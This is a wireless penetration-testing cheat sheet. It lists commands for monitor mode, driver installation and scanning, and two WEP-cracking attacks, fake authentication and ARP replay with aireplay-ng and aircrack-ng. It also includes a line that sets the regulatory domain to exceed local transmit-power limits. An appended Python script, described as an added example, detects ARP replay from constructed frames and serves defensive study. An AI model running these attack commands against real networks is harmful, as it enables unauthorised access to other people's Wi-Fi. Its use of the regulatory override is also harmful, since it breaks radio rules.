Wireless Penetration Testing Cheat Sheet [UPDATED – 2022]
WIRELESS ANTENNA
Kill Monitor Processes
root@uceka:~# airmon-ng check kill
Open the Monitor Mode
root@uceka:~# ifconfig wlan0 down
root@uceka:~# airmon-ng start wlan0
# if you get an error with airmon-ng command, try this:
# iwconfig wlan0 mode monitor
# use wlan0 instead of wlan0mon
root@uceka:~# ifconfig wlan0 up
Increase Wi-Fi TX Power
root@uceka:~# iw reg set BO
root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
# txpower is generally 30
# the permitted txpower depends on your country; look up the limit that applies to you
root@uceka:~# iwconfig
Change WiFi Channel
root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>
Driver Install (Kali – Alfa Adapter)
root@uceka:~# sudo apt update
root@uceka:~# sudo apt upgrade -y
root@uceka:~# sudo apt dist-upgrade -y
root@uceka:~# sudo reboot now
root@uceka:~# sudo apt update
root@uceka:~# sudo apt install realtek-rtl88xxau-dkms
root@uceka:~# sudo apt install dkms
root@uceka:~# git clone https://github.com/aircrack-ng/rtl8812au
root@uceka:~# cd rtl8812au/
root@uceka:~# sudo make
root@uceka:~# sudo make install
Scan
root@uceka:~# airodump-ng wlan0mon
# or
root@uceka:~# wifite
WEP CRACKING
Method 1 : Fake Authentication Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# What’s my MAC?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@uceka:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng -b <BSSID> <PCAP_of_FileName>
Method 2 : ARP Replay Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# What’s my MAC?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng -b <BSSID> <PCAP_of_FileName>
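Detection side of Method 2 (an added example, not part of the original cheat sheet): ARP replay re-sends one captured frame to the AP at the rate given by -x, so a monitoring sensor sees a single station emitting many same-length frames per second. The frame records, MAC addresses, field layout and the 100 frames/s threshold below are constructed assumptions for illustration.

```python
from collections import Counter

def sample_frames():
    """Constructed sample records: (timestamp_ms, source_mac, bssid, frame_len).
    Illustrative only, not real capture data."""
    frames = []
    # Ordinary client: about 4 frames per second with varied lengths.
    for i in range(40):
        frames.append((i * 250, "aa:aa:aa:00:00:01",
                       "cc:cc:cc:00:00:01", 90 + (i * 37) % 900))
    # Replaying station: one frame length, 500 frames per second for 2 s.
    for i in range(1000):
        frames.append((3000 + i * 2, "aa:aa:aa:00:00:02",
                       "cc:cc:cc:00:00:01", 68))
    return frames

def detect_replay(frames, max_same_per_sec=100):
    """Return {source_mac: peak_rate} for stations that send more than
    max_same_per_sec frames of one length to one BSSID in a 1 s bucket."""
    buckets = Counter()
    for ts_ms, src, bssid, length in frames:
        # Bucket by whole second so a burst is counted per second.
        buckets[(src, bssid, length, ts_ms // 1000)] += 1
    alerts = {}
    for (src, _bssid, _length, _sec), count in buckets.items():
        if count > max_same_per_sec:
            # Keep the highest per-second rate seen for this station.
            alerts[src] = max(alerts.get(src, 0), count)
    return alerts

if __name__ == "__main__":
    for mac, rate in detect_replay(sample_frames()).items():
        print(f"possible ARP replay from {mac}: {rate} same-length frames/s")
```

The threshold should be tuned against normal traffic on the monitored network before alerting on it.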